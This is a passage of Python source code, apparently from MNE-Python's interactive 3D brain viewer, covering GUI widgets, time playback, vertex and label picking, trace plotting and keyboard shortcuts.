self._configure_menu() self._configure_status_bar() self._configure_playback() self._configure_help() # show everything at the end self.toggle_interface() self._renderer.show() # sizes could change, update views for hemi in ('lh', 'rh'): for ri, ci, v in self._iter_views(hemi): self.show_view(view=v, row=ri, col=ci) self._renderer._process_events() self._renderer._update() # finally, show the MplCanvas if self.show_traces: self.mpl_canvas.show() if self._block: _qt_app_exec(self._renderer.figure.store["app"]) @safe_event def _clean(self): # resolve the reference cycle self.clear_glyphs() self.remove_annotations() # clear init actors for hemi in self._hemis: self._layered_meshes[hemi]._clean() self._clear_callbacks() self._clear_widgets() if getattr(self, 'mpl_canvas', None) is not None: self.mpl_canvas.clear() if getattr(self, 'act_data_smooth', None) is not None: for key in list(self.act_data_smooth.keys()): self.act_data_smooth[key] = None # XXX this should be done in PyVista for renderer in self._renderer._all_renderers: renderer.RemoveAllLights() # app_window cannot be set to None because it is used in __del__ for key in ('lighting', 'interactor', '_RenderWindow'): setattr(self.plotter, key, None) # Qt LeaveEvent requires _Iren so we use _FakeIren instead of None # to resolve the ref to 
vtkGenericRenderWindowInteractor self.plotter._Iren = _FakeIren() if getattr(self.plotter, 'picker', None) is not None: self.plotter.picker = None # XXX end PyVista for key in ('plotter', 'window', 'dock', 'tool_bar', 'menu_bar', 'interactor', 'mpl_canvas', 'time_actor', 'picked_renderer', 'act_data_smooth', '_scalar_bar', 'actions', 'widgets', 'geo', '_data'): setattr(self, key, None) self._cleaned = True def toggle_interface(self, value=None): """Toggle the interface. Parameters ---------- value : bool | None If True, the widgets are shown and if False, they are hidden. If None, the state of the widgets is toggled. Defaults to None. """ if value is None: self.visibility = not self.visibility else: self.visibility = value # update tool bar and dock with self._renderer._window_ensure_minimum_sizes(): if self.visibility: self._renderer._dock_show() self._renderer._tool_bar_update_button_icon( name="visibility", icon_name="visibility_on") else: self._renderer._dock_hide() self._renderer._tool_bar_update_button_icon( name="visibility", icon_name="visibility_off") self._renderer._update() def apply_auto_scaling(self): """Detect automatically fitting scaling parameters.""" self._update_auto_scaling() def restore_user_scaling(self): """Restore original scaling parameters.""" self._update_auto_scaling(restore=True) def toggle_playback(self, value=None): """Toggle time playback. Parameters ---------- value : bool | None If True, automatic time playback is enabled and if False, it's disabled. If None, the state of time playback is toggled. Defaults to None. """ if value is None: self.playback = not self.playback else: self.playback = value # update tool bar icon if self.playback: self._renderer._tool_bar_update_button_icon( name="play", icon_name="pause") else: self._renderer._tool_bar_update_button_icon( name="play", icon_name="play") if self.playback: time_data = self._data['time'] max_time = np.max(time_data) if self._current_time == max_time: # start over self.set_time_point(0) # first index self._last_tick = time.time() def reset(self): """Reset view and time step.""" self.reset_view() max_time = len(self._data['time']) - 1 if max_time > 0: self.callbacks["time"]( self._data["initial_time_idx"], update_widget=True, ) self._renderer._update() def set_playback_speed(self, speed): """Set the time playback speed. Parameters ---------- speed : float The speed of the playback. 
""" self.playback_speed = speed @safe_event def _play(self): if self.playback: try: self._advance() except Exception: self.toggle_playback(value=False) raise def _advance(self): this_time = time.time() delta = this_time - self._last_tick self._last_tick = time.time() time_data = self._data['time'] times = np.arange(self._n_times) time_shift = delta * self.playback_speed max_time = np.max(time_data) time_point = min(self._current_time + time_shift, max_time) # always use linear here -- this does not determine the data # interpolation mode, it just finds where we are (in time) in # terms of the time indices idx = np.interp(time_point, time_data, times) self.callbacks["time"](idx, update_widget=True) if time_point == max_time: self.toggle_playback(value=False) def _configure_time_label(self): self.time_actor = self._data.get('time_actor') if self.time_actor is not None: self.time_actor.SetPosition(0.5, 0.03) self.time_actor.GetTextProperty().SetJustificationToCentered() self.time_actor.GetTextProperty().BoldOn() def _configure_scalar_bar(self): if self._scalar_bar is not None: self._scalar_bar.SetOrientationToVertical() self._scalar_bar.SetHeight(0.6) self._scalar_bar.SetWidth(0.05) self._scalar_bar.SetPosition(0.02, 0.2) def _configure_dock_time_widget(self, layout=None): len_time = len(self._data['time']) - 1 if len_time < 1: return layout = self._renderer.dock_layout if layout is None else layout hlayout = self._renderer._dock_add_layout(vertical=False) self.widgets["min_time"] = self._renderer._dock_add_label( value="-", layout=hlayout) self._renderer._dock_add_stretch(hlayout) self.widgets["current_time"] = self._renderer._dock_add_label( value="x", layout=hlayout) self._renderer._dock_add_stretch(hlayout) self.widgets["max_time"] = self._renderer._dock_add_label( value="+", layout=hlayout) self._renderer._layout_add_widget(layout, hlayout) min_time = float(self._data['time'][0]) max_time = float(self._data['time'][-1]) self.widgets["min_time"].set_value(f"{min_time: .3f}") self.widgets["max_time"].set_value(f"{max_time: .3f}") self.widgets["current_time"].set_value(f"{self._current_time: .3f}") def _configure_dock_playback_widget(self, name): layout = self._renderer._dock_add_group_box(name) len_time = len(self._data['time']) - 1 # Time widget if len_time < 1: self.callbacks["time"] = None self.widgets["time"] = None else: self.callbacks["time"] = TimeCallBack( brain=self, callback=self.plot_time_line, ) self.widgets["time"] = self._renderer._dock_add_slider( name="Time (s)", value=self._data['time_idx'], rng=[0, len_time], double=True, callback=self.callbacks["time"], compact=False, layout=layout, ) self.callbacks["time"].widget = self.widgets["time"] # Time labels if len_time < 1: self.widgets["min_time"] = None self.widgets["max_time"] = None self.widgets["current_time"] = None else: self._configure_dock_time_widget(layout) self.callbacks["time"].label = self.widgets["current_time"] # Playback speed widget if len_time < 1: self.callbacks["playback_speed"] = None self.widgets["playback_speed"] = None else: self.callbacks["playback_speed"] = SmartCallBack( callback=self.set_playback_speed, ) self.widgets["playback_speed"] = self._renderer._dock_add_spin_box( name="Speed", value=self.default_playback_speed_value, rng=self.default_playback_speed_range, callback=self.callbacks["playback_speed"], layout=layout, ) self.callbacks["playback_speed"].widget = \ self.widgets["playback_speed"] # Time label current_time = self._current_time assert current_time is not None # should never be the 
case, float time_label = self._data['time_label'] if callable(time_label): current_time = time_label(current_time) else: current_time = time_label if self.time_actor is not None: self.time_actor.SetInput(current_time) del current_time def _configure_dock_orientation_widget(self, name): layout = self._renderer._dock_add_group_box(name) # Renderer widget rends = [str(i) for i in range(len(self._renderer._all_renderers))] if len(rends) > 1: def select_renderer(idx): idx = int(idx) loc = self._renderer._index_to_loc(idx) self.plotter.subplot(*loc) self.callbacks["renderer"] = SmartCallBack( callback=select_renderer, ) self.widgets["renderer"] = self._renderer._dock_add_combo_box( name="Renderer", value="0", rng=rends, callback=self.callbacks["renderer"], layout=layout, ) self.callbacks["renderer"].widget = \ self.widgets["renderer"] # Use 'lh' as a reference for orientation for 'both' if self._hemi == 'both': hemis_ref = ['lh'] else: hemis_ref = self._hemis orientation_data = [None] * len(rends) for hemi in hemis_ref: for ri, ci, v in self._iter_views(hemi): idx = self._renderer._loc_to_index((ri, ci)) if v == 'flat': _data = None else: _data = dict(default=v, hemi=hemi, row=ri, col=ci) orientation_data[idx] = _data self.callbacks["orientation"] = ShowView( brain=self, data=orientation_data, ) self.widgets["orientation"] = self._renderer._dock_add_combo_box( name=None, value=self.orientation[0], rng=self.orientation, callback=self.callbacks["orientation"], layout=layout, ) def _configure_dock_colormap_widget(self, name): layout = self._renderer._dock_add_group_box(name) self._renderer._dock_add_label( value="min / mid / max", align=True, layout=layout, ) up = UpdateLUT(brain=self) for key in self.keys: hlayout = self._renderer._dock_add_layout(vertical=False) rng = _get_range(self) self.callbacks[key] = lambda value, key=key: up(**{key: value}) self.widgets[key] = self._renderer._dock_add_slider( name=None, value=self._data[key], rng=rng, callback=self.callbacks[key], double=True, layout=hlayout, ) self.widgets[f"entry_{key}"] = self._renderer._dock_add_spin_box( name=None, value=self._data[key], callback=self.callbacks[key], rng=rng, layout=hlayout, ) up.widgets[key] = [self.widgets[key], self.widgets[f"entry_{key}"]] self._renderer._layout_add_widget(layout, hlayout) # reset / minus / plus hlayout = self._renderer._dock_add_layout(vertical=False) self._renderer._dock_add_label( value="Rescale", align=True, layout=hlayout, ) self.widgets["reset"] = self._renderer._dock_add_button( name="↺", callback=self.restore_user_scaling, layout=hlayout, style='toolbutton', ) for key, char, val in (("fminus", "➖", 1.2 ** -0.25), ("fplus", "➕", 1.2 ** 0.25)): self.callbacks[key] = UpdateColorbarScale( brain=self, factor=val, ) self.widgets[key] = self._renderer._dock_add_button( name=char, callback=self.callbacks[key], layout=hlayout, style='toolbutton', ) self._renderer._layout_add_widget(layout, hlayout) # register colorbar slider representations widgets = {key: self.widgets[key] for key in self.keys} for name in ("fmin", "fmid", "fmax", "fminus", "fplus"): self.callbacks[name].widgets = widgets def _configure_dock_trace_widget(self, name): if not self.show_traces: return # do not show trace mode for volumes if (self._data.get('src', None) is not None and self._data['src'].kind == 'volume'): self._configure_vertex_time_course() return layout = self._renderer._dock_add_group_box(name) # setup candidate annots def _set_annot(annot): self.clear_glyphs() self.remove_labels() self.remove_annotations() 
self.annot = annot if annot == 'None': self.traces_mode = 'vertex' self._configure_vertex_time_course() else: self.traces_mode = 'label' self._configure_label_time_course() self._renderer._update() # setup label extraction parameters def _set_label_mode(mode): if self.traces_mode != 'label': return glyphs = copy.deepcopy(self.picked_patches) self.label_extract_mode = mode self.clear_glyphs() for hemi in self._hemis: for label_id in glyphs[hemi]: label = self._annotation_labels[hemi][label_id] vertex_id = label.vertices[0] self._add_label_glyph(hemi, None, vertex_id) self.mpl_canvas.axes.relim() self.mpl_canvas.axes.autoscale_view() self.mpl_canvas.update_plot() self._renderer._update() from ...source_estimate import _get_allowed_label_modes from ...label import _read_annot_cands dir_name = op.join(self._subjects_dir, self._subject_id, 'label') cands = _read_annot_cands(dir_name, raise_error=False) cands = cands + ['None'] self.annot = cands[0] stc = self._data["stc"] modes = _get_allowed_label_modes(stc) if self._data["src"] is None: modes = [m for m in modes if m not in self.default_label_extract_modes["src"]] self.label_extract_mode = modes[-1] if self.traces_mode == 'vertex': _set_annot('None') else: _set_annot(self.annot) self.widgets["annotation"] = self._renderer._dock_add_combo_box( name="Annotation", value=self.annot, rng=cands, callback=_set_annot, layout=layout, ) self.widgets["extract_mode"] = self._renderer._dock_add_combo_box( name="Extract mode", value=self.label_extract_mode, rng=modes, callback=_set_label_mode, layout=layout, ) def _configure_dock(self): self._renderer._dock_initialize() self._configure_dock_playback_widget(name="Playback") self._configure_dock_orientation_widget(name="Orientation") self._configure_dock_colormap_widget(name="Color Limits") self._configure_dock_trace_widget(name="Trace") # Smoothing widget self.callbacks["smoothing"] = SmartCallBack( callback=self.set_data_smoothing, ) self.widgets["smoothing"] = self._renderer._dock_add_spin_box( name="Smoothing", value=self._data['smoothing_steps'], rng=self.default_smoothing_range, callback=self.callbacks["smoothing"], double=False ) self.callbacks["smoothing"].widget = \ self.widgets["smoothing"] self._renderer._dock_finalize() def _configure_playback(self): self._renderer._playback_initialize( func=self._play, timeout=self.refresh_rate_ms, value=self._data['time_idx'], rng=[0, len(self._data['time']) - 1], time_widget=self.widgets["time"], play_widget=self.widgets["play"], ) def _configure_mplcanvas(self): # Get the fractional components for the brain and mpl self.mpl_canvas = self._renderer._window_get_mplcanvas( brain=self, interactor_fraction=self.interactor_fraction, show_traces=self.show_traces, separate_canvas=self.separate_canvas ) xlim = [np.min(self._data['time']), np.max(self._data['time'])] with warnings.catch_warnings(): warnings.filterwarnings("ignore", category=UserWarning) self.mpl_canvas.axes.set(xlim=xlim) if not self.separate_canvas: self._renderer._window_adjust_mplcanvas_layout() self.mpl_canvas.set_color( bg_color=self._bg_color, fg_color=self._fg_color, ) def _configure_vertex_time_course(self): if not self.show_traces: return if self.mpl_canvas is None: self._configure_mplcanvas() else: self.clear_glyphs() # plot RMS of the activation y = np.concatenate(list(v[0] for v in self.act_data_smooth.values() if v[0] is not None)) rms = np.linalg.norm(y, axis=0) / np.sqrt(len(y)) del y self.rms, = self.mpl_canvas.axes.plot( self._data['time'], rms, lw=3, label='RMS', zorder=3, 
color=self._fg_color, alpha=0.5, ls=':') # now plot the time line self.plot_time_line(update=False) # then the picked points for idx, hemi in enumerate(['lh', 'rh', 'vol']): act_data = self.act_data_smooth.get(hemi, [None])[0] if act_data is None: continue hemi_data = self._data[hemi] vertices = hemi_data['vertices'] # simulate a picked renderer if self._hemi in ('both', 'rh') or hemi == 'vol': idx = 0 self.picked_renderer = self._renderer._all_renderers[idx] # initialize the default point if self._data['initial_time'] is not None: # pick at that time use_data = act_data[ :, [np.round(self._data['time_idx']).astype(int)]] else: use_data = act_data ind = np.unravel_index(np.argmax(np.abs(use_data), axis=None), use_data.shape) if hemi == 'vol': mesh = hemi_data['grid'] else: mesh = self._layered_meshes[hemi]._polydata vertex_id = vertices[ind[0]] self._add_vertex_glyph(hemi, mesh, vertex_id, update=False) def _configure_picking(self): # get data for each hemi from scipy import sparse for idx, hemi in enumerate(['vol', 'lh', 'rh']): hemi_data = self._data.get(hemi) if hemi_data is not None: act_data = hemi_data['array'] if act_data.ndim == 3: act_data = np.linalg.norm(act_data, axis=1) smooth_mat = hemi_data.get('smooth_mat') vertices = hemi_data['vertices'] if hemi == 'vol': assert smooth_mat is None smooth_mat = sparse.csr_matrix( (np.ones(len(vertices)), (vertices, np.arange(len(vertices))))) self.act_data_smooth[hemi] = (act_data, smooth_mat) self._renderer._update_picking_callback( self._on_mouse_move, self._on_button_press, self._on_button_release, self._on_pick ) def _configure_tool_bar(self): self._renderer._tool_bar_load_icons() self._renderer._tool_bar_set_theme(self.theme) self._renderer._tool_bar_initialize(name="Toolbar") self._renderer._tool_bar_add_file_button( name="screenshot", desc="Take a screenshot", func=self.save_image, ) self._renderer._tool_bar_add_file_button( name="movie", desc="Save movie...", func=lambda filename: self.save_movie( filename=filename, time_dilation=(1. 
/ self.playback_speed)), shortcut="ctrl+shift+s", ) self._renderer._tool_bar_add_button( name="visibility", desc="Toggle Controls", func=self.toggle_interface, icon_name="visibility_on" ) self.widgets["play"] = self._renderer._tool_bar_add_play_button( name="play", desc="Play/Pause", func=self.toggle_playback, shortcut=" ", ) self._renderer._tool_bar_add_button( name="reset", desc="Reset", func=self.reset, ) self._renderer._tool_bar_add_button( name="scale", desc="Auto-Scale", func=self.apply_auto_scaling, ) self._renderer._tool_bar_add_button( name="clear", desc="Clear traces", func=self.clear_glyphs, ) self._renderer._tool_bar_add_spacer() self._renderer._tool_bar_add_button( name="help", desc="Help", func=self.help, shortcut="?", ) def _shift_time(self, op): self.callbacks["time"]( value=(op(self._current_time, self.playback_speed)), time_as_index=False, update_widget=True, ) def _rotate_azimuth(self, value): azimuth = (self._renderer.figure._azimuth + value) % 360 self._renderer.set_camera(azimuth=azimuth, reset_camera=False) def _rotate_elevation(self, value): elevation = np.clip( self._renderer.figure._elevation + value, self._elevation_rng[0], self._elevation_rng[1], ) self._renderer.set_camera(elevation=elevation, reset_camera=False) def _configure_shortcuts(self): # First, we remove the default bindings: self._clear_callbacks() # Then, we add our own: self.plotter.add_key_event("i", self.toggle_interface) self.plotter.add_key_event("s", self.apply_auto_scaling) self.plotter.add_key_event("r", self.restore_user_scaling) self.plotter.add_key_event("c", self.clear_glyphs) self.plotter.add_key_event("n", partial(self._shift_time, op=lambda x, y: x + y)) self.plotter.add_key_event("b", partial(self._shift_time, op=lambda x, y: x - y)) for key, func, sign in (("Left", self._rotate_azimuth, 1), ("Right", self._rotate_azimuth, -1), ("Up", self._rotate_elevation, 1), ("Down", self._rotate_elevation, -1)): self.plotter.add_key_event(key, partial(func, sign * _ARROW_MOVE)) def _configure_menu(self): self._renderer._menu_initialize() self._renderer._menu_add_submenu( name="help", desc="Help", ) self._renderer._menu_add_button( menu_name="help", name="help", desc="Show MNE key bindings\t?", func=self.help, ) def _configure_status_bar(self): self._renderer._status_bar_initialize() self.status_msg = self._renderer._status_bar_add_label( self.default_status_bar_msg, stretch=1) self.status_progress = self._renderer._status_bar_add_progress_bar() if self.status_progress is not None: self.status_progress.hide() def _on_mouse_move(self, vtk_picker, event): if self._mouse_no_mvt: self._mouse_no_mvt -= 1 def _on_button_press(self, vtk_picker, event): self._mouse_no_mvt = 2 def _on_button_release(self, vtk_picker, event): if self._mouse_no_mvt > 0: x, y = vtk_picker.GetEventPosition() # programmatically detect the picked renderer try: # pyvista<0.30.0 self.picked_renderer = \ self.plotter.iren.FindPokedRenderer(x, y) except AttributeError: # pyvista>=0.30.0 self.picked_renderer = \ self.plotter.iren.interactor.FindPokedRenderer(x, y) # trigger the pick self.plotter.picker.Pick(x, y, 0, self.picked_renderer) self._mouse_no_mvt = 0 def _on_pick(self, vtk_picker, event): if not self.show_traces: return # vtk_picker is a vtkCellPicker cell_id = vtk_picker.GetCellId() mesh = vtk_picker.GetDataSet() if mesh is None or cell_id == -1 or not self._mouse_no_mvt: return # don't pick # 1) Check to see if there are any spheres along the ray if len(self._spheres): collection = vtk_picker.GetProp3Ds() found_sphere = 
None for ii in range(collection.GetNumberOfItems()): actor = collection.GetItemAsObject(ii) for sphere in self._spheres: if any(a is actor for a in sphere._actors): found_sphere = sphere break if found_sphere is not None: break if found_sphere is not None: assert found_sphere._is_glyph mesh = found_sphere # 2) Remove sphere if it's what we have if hasattr(mesh, "_is_glyph"): self._remove_vertex_glyph(mesh) return # 3) Otherwise, pick the objects in the scene try: hemi = mesh._hemi except AttributeError: # volume hemi = 'vol' else: assert hemi in ('lh', 'rh') if self.act_data_smooth[hemi][0] is None: # no data to add for hemi return pos = np.array(vtk_picker.GetPickPosition()) if hemi == 'vol': # VTK will give us the point closest to the viewer in the vol. # We want to pick the point with the maximum value along the # camera-to-click array, which fortunately we can get "just" # by inspecting the points that are sufficiently close to the # ray. grid = mesh = self._data[hemi]['grid'] vertices = self._data[hemi]['vertices'] coords = self._data[hemi]['grid_coords'][vertices] scalars = _cell_data(grid)['values'][vertices] spacing = np.array(grid.GetSpacing()) max_dist = np.linalg.norm(spacing) / 2. origin = vtk_picker.GetRenderer().GetActiveCamera().GetPosition() ori = pos - origin ori /= np.linalg.norm(ori) # the magic formula: distance from a ray to a given point dists = np.linalg.norm(np.cross(ori, coords - pos), axis=1) assert dists.shape == (len(coords),) mask = dists <= max_dist idx = np.where(mask)[0] if len(idx) == 0: return # weird point on edge of volume? # useful for debugging the ray by mapping it into the volume: # dists = dists - dists.min() # dists = (1. - dists / dists.max()) * self._cmap_range[1] # _cell_data(grid)['values'][vertices] = dists * mask idx = idx[np.argmax(np.abs(scalars[idx]))] vertex_id = vertices[idx] # Naive way: convert pos directly to idx; i.e., apply mri_src_t # shape = self._data[hemi]['grid_shape'] # taking into account the cell vs point difference (spacing/2) # shift = np.array(grid.GetOrigin()) + spacing / 2. 
# ijk = np.round((pos - shift) / spacing).astype(int) # vertex_id = np.ravel_multi_index(ijk, shape, order='F') else: vtk_cell = mesh.GetCell(cell_id) cell = [vtk_cell.GetPointId(point_id) for point_id in range(vtk_cell.GetNumberOfPoints())] vertices = mesh.points[cell] idx = np.argmin(abs(vertices - pos), axis=0) vertex_id = cell[idx[0]] if self.traces_mode == 'label': self._add_label_glyph(hemi, mesh, vertex_id) else: self._add_vertex_glyph(hemi, mesh, vertex_id) def _add_label_glyph(self, hemi, mesh, vertex_id): if hemi == 'vol': return label_id = self._vertex_to_label_id[hemi][vertex_id] label = self._annotation_labels[hemi][label_id] # remove the patch if already picked if label_id in self.picked_patches[hemi]: self._remove_label_glyph(hemi, label_id) return if hemi == label.hemi: self.add_label(label, borders=True, reset_camera=False) self.picked_patches[hemi].append(label_id) def _remove_label_glyph(self, hemi, label_id): label = self._annotation_labels[hemi][label_id] label._line.remove() self.color_cycle.restore(label._color) self.mpl_canvas.update_plot() self._layered_meshes[hemi].remove_overlay(label.name) self.picked_patches[hemi].remove(label_id) def _add_vertex_glyph(self, hemi, mesh, vertex_id, update=True): if vertex_id in self.picked_points[hemi]: return # skip if the wrong hemi is selected if self.act_data_smooth[hemi][0] is None: return color = next(self.color_cycle) line = self.plot_time_course(hemi, vertex_id, color, update=update) if hemi == 'vol': ijk = np.unravel_index( vertex_id, np.array(mesh.GetDimensions()) - 1, order='F') # should just be GetCentroid(center), but apparently it's VTK9+: # center = np.empty(3) # voxel.GetCentroid(center) voxel = mesh.GetCell(*ijk) pts = voxel.GetPoints() n_pts = pts.GetNumberOfPoints() center = np.empty((n_pts, 3)) for ii in range(pts.GetNumberOfPoints()): pts.GetPoint(ii, center[ii]) center = np.mean(center, axis=0) else: center = mesh.GetPoints().GetPoint(vertex_id) del mesh # from the picked renderer to the subplot coords try: lst = self._renderer._all_renderers._renderers except AttributeError: lst = self._renderer._all_renderers rindex = lst.index(self.picked_renderer) row, col = self._renderer._index_to_loc(rindex) actors = list() spheres = list() for _ in self._iter_views(hemi): # Using _sphere() instead of renderer.sphere() for 2 reasons: # 1) renderer.sphere() fails on Windows in a scenario where a lot # of picking requests are done in a short span of time (could be # mitigated with synchronization/delay?) # 2) the glyph filter is used in renderer.sphere() but only one # sphere is required in this function. 
actor, sphere = self._renderer._sphere( center=np.array(center), color=color, radius=4.0, ) actors.append(actor) spheres.append(sphere) # add metadata for picking for sphere in spheres: sphere._is_glyph = True sphere._hemi = hemi sphere._line = line sphere._actors = actors sphere._color = color sphere._vertex_id = vertex_id self.picked_points[hemi].append(vertex_id) self._spheres.extend(spheres) self.pick_table[vertex_id] = spheres return sphere def _remove_vertex_glyph(self, mesh, render=True): vertex_id = mesh._vertex_id if vertex_id not in self.pick_table: return hemi = mesh._hemi color = mesh._color spheres = self.pick_table[vertex_id] spheres[0]._line.remove() self.mpl_canvas.update_plot() self.picked_points[hemi].remove(vertex_id) with warnings.catch_warnings(record=True): # We intentionally ignore these in case we have traversed the # entire color cycle warnings.simplefilter('ignore') self.color_cycle.restore(color) for sphere in spheres: # remove all actors self.plotter.remove_actor(sphere._actors, render=render) sphere._actors = None self._spheres.pop(self._spheres.index(sphere)) self.pick_table.pop(vertex_id) def clear_glyphs(self): """Clear the picking glyphs.""" if not self.time_viewer: return for sphere in list(self._spheres): # will remove itself, so copy self._remove_vertex_glyph(sphere, render=False) assert sum(len(v) for v in self.picked_points.values()) == 0 assert len(self.pick_table) == 0 assert len(self._spheres) == 0 for hemi in self._hemis: for label_id in list(self.picked_patches[hemi]): self._remove_label_glyph(hemi, label_id) assert sum(len(v) for v in self.picked_patches.values()) == 0 if self.rms is not None: self.rms.remove() self.rms = None self._renderer._update() def plot_time_course(self, hemi, vertex_id, color, update=True): """Plot the vertex time course. Parameters ---------- hemi : str The hemisphere id of the vertex. vertex_id : int The vertex identifier in the mesh. color : matplotlib color The color of the time course. update : bool Force an update of the plot. Defaults to True. Returns ------- line : matplotlib object The time line object. """ if self.mpl_canvas is None: return time = self._data['time'].copy() # avoid circular ref mni = None if hemi == 'vol': hemi_str = 'V' xfm = read_talxfm( self._subject_id, self._subjects_dir) if self._units == 'mm': xfm['trans'][:3, 3] *= 1000. ijk = np.unravel_index( vertex_id, self._data[hemi]['grid_shape'], order='F') src_mri_t = self._data[hemi]['grid_src_mri_t'] mni = apply_trans(np.dot(xfm['trans'], src_mri_t), ijk) else: hemi_str = 'L' if hemi == 'lh' else 'R' try: mni = vertex_to_mni( vertices=vertex_id, hemis=0 if hemi == 'lh' else 1, subject=self._subject_id, subjects_dir=self._subjects_dir ) except Exception: mni = None if mni is not None: mni = ' MNI: ' + ', '.join('%5.1f' % m for m in mni) else: mni = '' label = "{}:{}{}".format(hemi_str, str(vertex_id).ljust(6), mni) act_data, smooth = self.act_data_smooth[hemi] if smooth is not None: act_data = smooth[vertex_id].dot(act_data)[0] else: act_data = act_data[vertex_id].copy() line = self.mpl_canvas.plot( time, act_data, label=label, lw=1., color=color, zorder=4, update=update, ) return line def plot_time_line(self, update=True): """Add the time line to the MPL widget. Parameters ---------- update : bool Force an update of the plot. Defaults to True. 
""" if self.mpl_canvas is None: return if isinstance(self.show_traces, bool) and self.show_traces: # add time information current_time = self._current_time if not hasattr(self, "time_line"): self.time_line = self.mpl_canvas.plot_time_line( x=current_time, label='time', color=self._fg_color, lw=1, update=update, ) self.time_line.set_xdata(current_time) if update: self.mpl_canvas.update_plot() def _configure_help(self): pairs = [ ('?', 'Display help window'), ('i', 'Toggle interface'), ('s', 'Apply auto-scaling'), ('r', 'Restore original clim'), ('c', 'Clear all traces'), ('n', 'Shift the time forward by the playback speed'), ('b', 'Shift the time backward by the playback speed'), ('Space', 'Start/Pause playback'), ('Up', 'Decrease camera elevation angle'), ('Down', 'Increase camera elevation angle'), ('Left', 'Decrease camera azimuth angle'), ('Right', 'Increase camera azimuth angle'), ] text1, text2 = zip(*pairs) text1 = '\n'.join(text1) text2 = '\n'.join(text2) self.help_canvas = self._renderer._window_get_simple_canvas( width=5, height=2, dpi=80) _show_help_fig( col1=text1, col2=text2, fig_help=self.help_canvas.fig, ax=self.help_canvas.axes, show=False, ) def help(self): """Display the help window.""" self.help_canvas.show() def _clear_callbacks(self): if not hasattr(self, 'callbacks'): return for callback in self.callbacks.values(): if callback is not None: for key in ('plotter', 'brain', 'callback', 'widget', 'widgets'): setattr(callback, key, None) self.callbacks.clear() # Remove the default key binding if getattr(self, "iren", None) is not None: self.plotter.iren.clear_key_event_callbacks() def _clear_widgets(self): if not hasattr(self, 'widgets'): return for widget in self.widgets.values(): if widget is not None: for key in ('triggered', 'valueChanged'): setattr(widget, key, None) self.widgets.clear() @property def interaction(self): """The interaction style.""" return self._interaction @interaction.setter def interaction(self, interaction): """Set the interaction style.""" _validate_type(interaction, str, 'interaction') _check_option('interaction', interaction, ('trackball', 'terrain')) for _ in self._iter_views('vol'): # will traverse all self._renderer.set_interaction(interaction) def _cortex_colormap(self, cortex): """Return the colormap corresponding to the cortex.""" from .._3d import _get_cmap from matplotlib.colors import ListedColormap colormap_map = dict(classic=dict(colormap="Greys", vmin=-1, vmax=2), high_contrast=dict(colormap="Greys", vmin=-.1, vmax=1.3), low_contrast=dict(colormap="Greys", vmin=-5, vmax=5), bone=dict(colormap="bone_r", vmin=-.2, vmax=2), ) _validate_type(cortex, (str, dict, list, tuple), 'cortex') if isinstance(cortex, str): if cortex in colormap_map: cortex = colormap_map[cortex] else: cortex = [cortex] * 2 if isinstance(cortex, (list, tuple)): _check_option('len(cortex)', len(cortex), (2, 3), extra='when cortex is a list or tuple') if len(cortex) == 3: cortex = [cortex] * 2 cortex = list(cortex) for ci, c in enumerate(cortex): cortex[ci] = _to_rgb(c, name='cortex') cortex = dict( colormap=ListedColormap(cortex, name='custom binary'), vmin=0, vmax=1) cortex = dict( vmin=float(cortex['vmin']), vmax=float(cortex['vmax']), colormap=_get_cmap(cortex['colormap']), ) return cortex def _remove(self, item, render=False): """Remove actors from the rendered scene.""" if item in self._actors: logger.debug( f'Removing {len(self._actors[item])} {item} actor(s)') for actor in self._actors[item]: self._renderer.plotter.remove_actor(actor) self._actors.pop(item) # 
remove actor list if render: self._renderer._update() def _add_actor(self, item, actor): """Add an actor to the internal register.""" if item in self._actors: # allows adding more than one self._actors[item].append(actor) else: self._actors[item] = [actor] @verbose def add_data(self, array, fmin=None, fmid=None, fmax=None, thresh=None, center=None, transparent=False, colormap="auto", alpha=1, vertices=None, smoothing_steps=None, time=None, time_label="auto", colorbar=True, hemi=None, remove_existing=None, time_label_size=None, initial_time=None, scale_factor=None, vector_alpha=None, clim=None, src=None, volume_options=0.4, colorbar_kwargs=None, verbose=None): """Display data from a numpy array on the surface or volume. This provides a similar interface to :meth:`surfer.Brain.add_overlay`, but it displays it with a single colormap. It offers more flexibility over the colormap, and provides a way to display four-dimensional data (i.e., a timecourse) or five-dimensional data (i.e., a vector-valued timecourse). .. note:: ``fmin`` sets the low end of the colormap, and is separate from thresh (this is a different convention from :meth:`surfer.Brain.add_overlay`). Parameters ---------- array : numpy array, shape (n_vertices[, 3][, n_times]) Data array. For the data to be understood as vector-valued (3 values per vertex corresponding to X/Y/Z surface RAS), then ``array`` must be have all 3 dimensions. If vectors with no time dimension are desired, consider using a singleton (e.g., ``np.newaxis``) to create a "time" dimension and pass ``time_label=None`` (vector values are not supported). %(fmin_fmid_fmax)s %(thresh)s %(center)s %(transparent)s colormap : str, list of color, or array Name of matplotlib colormap to use, a list of matplotlib colors, or a custom look up table (an n x 4 array coded with RBGA values between 0 and 255), the default "auto" chooses a default divergent colormap, if "center" is given (currently "icefire"), otherwise a default sequential colormap (currently "rocket"). alpha : float in [0, 1] Alpha level to control opacity of the overlay. vertices : numpy array Vertices for which the data is defined (needed if ``len(data) < nvtx``). smoothing_steps : int or None Number of smoothing steps (smoothing is used if len(data) < nvtx) The value 'nearest' can be used too. None (default) will use as many as necessary to fill the surface. time : numpy array Time points in the data array (if data is 2D or 3D). %(time_label)s colorbar : bool Whether to add a colorbar to the figure. Can also be a tuple to give the (row, col) index of where to put the colorbar. hemi : str | None If None, it is assumed to belong to the hemisphere being shown. If two hemispheres are being shown, an error will be thrown. remove_existing : bool Not supported yet. Remove surface added by previous "add_data" call. Useful for conserving memory when displaying different data in a loop. time_label_size : int Font size of the time label (default 14). initial_time : float | None Time initially shown in the plot. ``None`` to use the first time sample (default). scale_factor : float | None (default) The scale factor to use when displaying glyphs for vector-valued data. vector_alpha : float | None Alpha level to control opacity of the arrows. Only used for vector-valued data. If None (default), ``alpha`` is used. clim : dict Original clim arguments. %(src_volume_options)s colorbar_kwargs : dict | None Options to pass to :meth:`pyvista.Plotter.add_scalar_bar` (e.g., ``dict(title_font_size=10)``). 
